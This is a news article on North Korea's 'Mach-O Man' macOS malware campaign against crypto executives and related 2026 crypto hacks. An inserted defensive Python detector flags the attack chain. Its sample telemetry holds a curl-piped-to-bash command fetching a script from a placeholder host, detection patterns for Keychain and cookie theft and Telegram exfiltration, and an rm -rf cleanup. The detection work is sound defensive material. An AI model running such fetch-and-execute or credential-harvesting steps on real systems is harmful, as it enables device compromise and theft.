
Lazarus Group’s Mach-O Man Malware Targets Crypto Executives on macOS

North Korea’s Lazarus Group has deployed a new macOS malware campaign called “Mach-O Man,” using fake Zoom and Google Meet invitations to trick crypto and fintech executives into executing malicious commands on their own devices. Security researchers flagged the campaign on April 22, linking it to the same state-sponsored operation responsible for the $1.4 billion Bybit hack in 2025. The threat is modular, stealthy, and deliberately engineered to sidestep conventional endpoint defenses.

How the Mach-O Man Kit Operates

According to Mauro Eldritch, offensive security expert and founder of threat intelligence firm BCA Ltd., victims receive convincing invitations to online meetings, then encounter “ClickFix” prompts that instruct them to run terminal commands. Those commands silently download the malware in the background, bypassing standard macOS controls without triggering alerts. The final payload is a stealer module that extracts browser credentials, cookies, browser extension data, and macOS Keychain entries, before compressing everything into a zip file and exfiltrating it through Telegram. A self-deletion script then removes the entire kit using the system’s rm command, eliminating forensic traces.
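
A defender-side illustration of the chain just described, added here and not from the article or the researchers it cites: it correlates the ClickFix terminal launch, credential-store reads, archive staging, a connection to Telegram's bot API host and the rm cleanup in constructed macOS endpoint telemetry (the event schema, stage names, hostname and paths are assumptions; api.telegram.org is Telegram's real Bot API host).

```python
import re
from dataclasses import dataclass

@dataclass
class Event:            # constructed telemetry schema, not any real EDR's
    ts: int             # seconds
    user: str
    kind: str           # "exec", "open" or "connect"
    parent: str = ""    # parent image name (exec only)
    detail: str = ""    # command line, file path or destination host

# One regex per stage of the chain the article describes. Each is ordinary alone
# (people zip files and run rm); the anchored, ordered sequence is the signal.
STAGES = [
    ("clickfix_download_exec", "exec", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("credential_store_read", "open", re.compile(r"Library/(Keychains|Cookies|Application Support/(Google/Chrome|BraveSoftware|Firefox))")),
    ("archive_staging", "exec", re.compile(r"^(zip|ditto|tar)\b")),
    ("telegram_api_connect", "connect", re.compile(r"^api\.telegram\.org$")),
    ("self_delete", "exec", re.compile(r"^rm\s+-[rRf]+")),
]

def stage_of(ev):
    """Stage name for one event, or None; the anchor must be spawned from a terminal emulator."""
    for name, kind, pat in STAGES:
        if ev.kind == kind and pat.search(ev.detail):
            return None if name == STAGES[0][0] and ev.parent not in ("Terminal", "iTerm2") else name
    return None

def detect_chain(events, window=600, min_stages=4):
    """Per user, stages seen within `window` seconds after the anchor; {user: [stages]} when >= min_stages."""
    chains = {}
    for ev in sorted(events, key=lambda e: e.ts):
        name = stage_of(ev)
        if name is None:
            continue
        c = chains.setdefault(ev.user, {"start": None, "stages": []})
        if name == STAGES[0][0] and c["start"] is None:
            c["start"] = ev.ts
        elif c["start"] is None or ev.ts - c["start"] > window:
            continue  # not anchored to a terminal download yet, or outside the window
        if name not in c["stages"]:
            c["stages"].append(name)
    return {u: c["stages"] for u, c in chains.items() if len(c["stages"]) >= min_stages}

SAMPLE = [  # constructed events; hostname and paths are placeholders, not real indicators
    Event(100, "alice", "exec", "Terminal", "curl -fsSL https://meeting-fix.example/fix.sh | bash"),
    Event(130, "alice", "open", detail="/Users/alice/Library/Keychains/login.keychain-db"),
    Event(131, "alice", "open", detail="/Users/alice/Library/Application Support/Google/Chrome/Default/Cookies"),
    Event(140, "alice", "exec", "bash", "zip -r /tmp/stage.zip /tmp/collected"),
    Event(145, "alice", "connect", detail="api.telegram.org"),
    Event(150, "alice", "exec", "bash", "rm -rf /tmp/stage.zip /tmp/collected"),
    Event(300, "bob", "exec", "bash", "zip -r backup.zip Documents"),  # benign: no anchor, never alerts
]
```

Running `detect_chain(SAMPLE)` flags only alice with all five stages in order; the same telemetry with a ten-second window raises nothing, which is the tuning knob to watch if the kit is delayed between stages.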

Separately, blockchain security firm SlowMist flagged a related threat called “MacSync Stealer,” described as a highly destructive macOS campaign designed to drain cryptocurrency wallets and extract infrastructure credentials. Whether the two campaigns share code or operators remains unconfirmed, but their timing and targeting overlap considerably.


A Broader Attack Surge Straining the Industry

Mach-O Man arrives amid what CertiK senior blockchain investigator Natalie Newson describes as a deteriorating threat environment across the entire sector. The industry has already lost over $600 million to hacks in 2026, driven largely by two DPRK-linked exploits in April: a $293 million attack on Kelp DAO exploiting a single point-of-trust failure in LayerZero’s cross-chain messaging infrastructure, and a $280 million exploit of the Drift Protocol. Newson identifies real-time deepfakes, phishing, supply chain compromises, and cross-chain vulnerabilities as the primary vectors likely to define 2026’s biggest breaches.

The wallet app attack surface is expanding too. Kaspersky has identified 26 fraudulent cryptocurrency wallet applications on Apple’s App Store, active since at least fall 2025, that impersonate MetaMask, Ledger, Trust Wallet, and Coinbase to redirect users toward trojanized installs. This follows the fake Ledger app that drained $9.5 million from App Store users in just six days earlier this month, a signal that app store gatekeeping is not keeping pace with adversarial creativity.

What these campaigns share is architectural discipline: each one exploits human trust rather than zero-day software flaws, and each cleans up after itself. That discipline is a feature of well-resourced, state-directed operations, not opportunistic criminal groups. The infrastructure protecting this industry needs to mature at the same rate the adversaries are evolving their tradecraft, and right now, the evidence suggests it is not. That gap is the real vulnerability worth closing.

Alyssa Monroe

I track the technology that powers crypto. Layer 1 networks, scaling layers, developer ecosystems and the infrastructure quietly expanding what blockchains can do. Ethereum, Solana, Avalanche, Polkadot. Rollups, Lightning, cross-chain systems, tokenised assets. Markets chase price. I watch builders, protocol upgrades and the milestones that signal real adoption.
